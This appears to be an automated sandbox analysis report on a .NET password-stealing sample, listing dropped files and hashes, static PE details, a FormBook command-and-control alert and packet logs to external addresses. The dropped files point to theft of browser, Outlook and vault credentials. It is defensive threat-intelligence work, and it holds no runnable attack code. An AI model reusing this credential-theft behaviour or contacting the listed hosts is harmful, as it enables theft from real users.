                                                      C:\Users\user\AppData\Roaming\479O54QF\479logrc.ini

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):812
                                                      Entropy (8bit):3.551644151882457
                                                      Encrypted:false
                                                      SSDEEP:24:YUd8aU5okH+gUca7b50d8a45lUd7gScpD7b5G:bdSCy3hdGFW
                                                      MD5:BDA0AFD5A9D0085F5D23856A8DABF41F
                                                      SHA1:845923C84C0A3B03C0681BDC9AD40BD372FFF941
                                                      SHA-256:8701239D15BA2C711165C65E6E07A06EF2C0963EDC6E7CD651F27F61AD81D0F2
                                                      SHA-512:04E3DF3119E9EEEFFD0D7F4D50A5802B5A20E6F5A00B386C2FACB207867CC9B0CA8116E1346786B8CB6BBF62C24E6F552D340B4C89E5110BAA30CE082C67913D
                                                      Malicious:false
                                                      Preview:....O.u.t.l.o.o.k. .R.e.c.o.v.e.r.y.....c.l.s.i.d...{.E.D.4.7.5.4.1.4.-.B.0.D.6.-.1.1.D.2.-.8.C.3.B.-.0.0.1.0.4.B.2.A.6.6.7.6.}. .....M.i.n.i. .U.I.D...3.5.5.7.6.7.0.6.2.0.....S.e.r.v.i.c.e. .U.I.D... . . . . . . . .....S.e.r.v.i.c.e. .N.a.m.e...C.O.N.T.A.B. .....M.A.P.I. .P.r.o.v.i.d.e.r...2.....A.c.c.o.u.n.t. .N.a.m.e...O.u.t.l.o.o.k. .A.d.d.r.e.s.s. .B.o.o.k. .....P.r.e.f.e.r.e.n.c.e.s. .U.I.D... . . . . . . . .........c.l.s.i.d...{.E.D.4.7.5.4.1.4.-.B.0.D.6.-.1.1.D.2.-.8.C.3.B.-.0.0.1.0.4.B.2.A.6.6.7.6.}. .....M.i.n.i. .U.I.D...2.1.4.4.9.7.4.3.6.2.....S.e.r.v.i.c.e. .U.I.D... . . . . . . . .....S.e.r.v.i.c.e. .N.a.m.e...M.S.U.P.S.T. .M.S. .....M.A.P.I. .P.r.o.v.i.d.e.r...4.....A.c.c.o.u.n.t. .N.a.m.e...O.u.t.l.o.o.k. .D.a.t.a. .F.i.l.e. .....P.r.e.f.e.r.e.n.c.e.s. .U.I.D... . . . . . . . .........

                                                      C:\Users\user\AppData\Roaming\479O54QF\479logrg.ini

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                      File Type:Targa image data - RGB - RLE 109 x 101 x 32 +114 +111 "R"
                                                      Category:dropped
                                                      Size (bytes):38
                                                      Entropy (8bit):2.7883088224543333
                                                      Encrypted:false
                                                      SSDEEP:3:rFGQJhIl:RGQPY
                                                      MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                                      SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                                      SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                                      SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                                      Malicious:false
                                                      Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

                                                      C:\Users\user\AppData\Roaming\479O54QF\479logri.ini

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):40
                                                      Entropy (8bit):2.8420918598895937
                                                      Encrypted:false
                                                      SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                                      MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                                      SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                                      SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                                      SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                                      Malicious:true
                                                      Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

                                                      C:\Users\user\AppData\Roaming\479O54QF\479logrv.ini

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):40
                                                      Entropy (8bit):2.96096404744368
                                                      Encrypted:false
                                                      SSDEEP:3:AJlbeGQJhIl:tGQPY
                                                      MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
                                                      SHA1:24CB89501F0212FF3095ECC0ABA97DD563718FB1
                                                      SHA-256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
                                                      SHA-512:ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
                                                      Malicious:true
                                                      Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....

                                                      C:\Users\user\AppData\Roaming\hkkRsa.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):714752
                                                      Entropy (8bit):7.447804085883893
                                                      Encrypted:false
                                                      SSDEEP:12288:pS6ln+flo/XciMvHqpJr5OM2roh+AvKOdSHYYb+4YTePd0iTffYqHey2YQPdOl7N:wTdCjEHor5h8SnkYYq5Ud0kffL2lk74i
                                                      MD5:D72C3BB3172D13AC1CFC172C389E52E5
                                                      SHA1:A0BF2DC6BA08E4702098576B8E91F08C91A201CA
                                                      SHA-256:2B7C90F224A3F2964F56820652AE35673CB830D152DC2203EC1629F69B8F5A00
                                                      SHA-512:2B78732BB0BEB0306521E5D38B6EA9C575FB62E263AA2973D57DD33D62B413B8FBAA058A03A3D78C0204D8BDC4398F5B04728E1B1F6E5DC548D995C189D20875
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 24%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....d..............0.............n.... ........@.. .......................@............@.....................................O.......p.................... ......`...T............................................ ............... ..H............text...t.... ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B................M.......H........1.../...........a..X{..........................................&.(......*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*..

                                                      C:\Users\user\AppData\Roaming\hkkRsa.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.447804085883893
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      File size:714'752 bytes
                                                      MD5:d72c3bb3172d13ac1cfc172c389e52e5
                                                      SHA1:a0bf2dc6ba08e4702098576b8e91f08c91a201ca
                                                      SHA256:2b7c90f224a3f2964f56820652ae35673cb830d152dc2203ec1629f69b8f5a00
                                                      SHA512:2b78732bb0beb0306521e5d38b6ea9c575fb62e263aa2973d57dd33d62b413b8fbaa058a03a3d78c0204d8bdc4398f5b04728e1b1f6e5dc548d995c189d20875
                                                      SSDEEP:12288:pS6ln+flo/XciMvHqpJr5OM2roh+AvKOdSHYYb+4YTePd0iTffYqHey2YQPdOl7N:wTdCjEHor5h8SnkYYq5Ud0kffL2lk74i
                                                      TLSH:97E402815F525076C206BF398744B7B4C11F9DD6742BAB0BAE93F257A8FB6C27A03058
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d..............0.............n.... ........@.. .......................@............@................................

                                                      File Icon

                                                      Icon Hash:98306e8c8cb6828c

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x49f26e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x64B8D5D6 [Thu Jul 20 06:36:06 2023 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x9f2190x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x10e70.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x9dc600x54.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x9d2740x9d400False0.9419574100755167data7.772224469495988IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xa00000x10e700x11000False0.055161420036764705data1.505780016282093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xb20000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xa01300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.045353720572577784
                                                      RT_GROUP_ICON0xb09580x14data1.0
                                                      RT_VERSION0xb096c0x318data0.44191919191919193
                                                      RT_MANIFEST0xb0c840x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      192.168.2.523.227.38.7449731802031412 07/20/23-11:46:57.367343TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.523.227.38.74

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jul 20, 2023 11:44:37.556649923 CEST4971180192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:37.719366074 CEST804971186.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:37.720453978 CEST4971180192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:37.828722954 CEST4971180192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:37.991332054 CEST804971186.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:37.992095947 CEST804971186.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:37.992233038 CEST804971186.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:37.992336035 CEST4971180192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:37.992336035 CEST4971180192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:38.154855967 CEST804971186.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:40.116504908 CEST4971280192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:40.278722048 CEST804971286.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:40.282660961 CEST4971280192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:40.282881975 CEST4971280192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:40.282927036 CEST4971280192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:40.284251928 CEST4971380192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:40.445178032 CEST804971286.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:40.445296049 CEST804971286.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:40.445384026 CEST4971280192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:40.445655107 CEST804971286.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:40.445728064 CEST4971280192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:40.457446098 CEST804971386.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:40.457559109 CEST4971380192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:40.459691048 CEST4971380192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:40.622814894 CEST804971386.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:40.622956038 CEST4971380192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:40.622970104 CEST804971386.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:40.622998953 CEST804971386.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:40.623047113 CEST4971380192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:40.623068094 CEST4971380192.168.2.586.38.202.187
                                                      Jul 20, 2023 11:44:40.786137104 CEST804971386.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:40.786166906 CEST804971386.38.202.187192.168.2.5
                                                      Jul 20, 2023 11:44:50.590708971 CEST4971480192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:50.607429028 CEST8049714172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:50.607642889 CEST4971480192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:50.607834101 CEST4971480192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:50.624234915 CEST8049714172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:50.752696991 CEST8049714172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:50.752728939 CEST8049714172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:50.752829075 CEST8049714172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:50.752931118 CEST4971480192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:50.752988100 CEST4971480192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:50.753007889 CEST4971480192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.792840958 CEST4971580192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.809427023 CEST8049715172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.809520006 CEST4971580192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.809835911 CEST4971580192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.809889078 CEST4971580192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.812988043 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.826431990 CEST8049715172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.826457977 CEST8049715172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.829694986 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.829793930 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.832479000 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.849033117 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.849144936 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.849178076 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.849256039 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.865768909 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.865787983 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.865837097 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.865852118 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.865911961 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.865921974 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.865937948 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.865966082 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.866009951 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.866013050 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.866069078 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.867378950 CEST8049715172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.883460999 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.883488894 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.883502960 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.883517027 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.883529902 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.883543968 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.883575916 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.883641005 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.883673906 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.883697987 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.883727074 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.883740902 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.883781910 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.884095907 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.884141922 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.884253979 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.884287119 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.884299994 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.884344101 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.884380102 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.884433985 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.884454012 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.884504080 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.900367975 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.900455952 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.900496006 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.900511026 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.900568008 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.900686026 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.900700092 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.900746107 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.900803089 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.900816917 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.900861979 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.900876045 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.900943995 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.901036024 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.901050091 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.901062965 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.901159048 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.901173115 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.901242018 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.901287079 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.901350975 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.927716017 CEST8049715172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.927746058 CEST8049715172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.927783012 CEST8049715172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.927872896 CEST4971580192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.927917004 CEST4971580192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.941715002 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.989120007 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.989137888 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.989303112 CEST8049716172.67.215.254192.168.2.5
                                                      Jul 20, 2023 11:44:52.989321947 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:44:52.989350080 CEST4971680192.168.2.5172.67.215.254
                                                      Jul 20, 2023 11:45:11.284499884 CEST4971780192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:11.299213886 CEST8049717152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:11.299308062 CEST4971780192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:11.299627066 CEST4971780192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:11.314146996 CEST8049717152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:11.370085001 CEST8049717152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:11.370115995 CEST8049717152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:11.370326996 CEST4971780192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:11.370362997 CEST4971780192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:11.385124922 CEST8049717152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.374444008 CEST4971880192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.389204025 CEST8049718152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.389389992 CEST4971880192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.389787912 CEST4971880192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.389787912 CEST4971880192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.392288923 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.404472113 CEST8049718152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.404510975 CEST8049718152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.406831980 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.406996965 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.409661055 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.424377918 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424401045 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424513102 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424529076 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424536943 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424566031 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.424631119 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.424650908 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424755096 CEST8049719152.199.21.175192.168.2.5
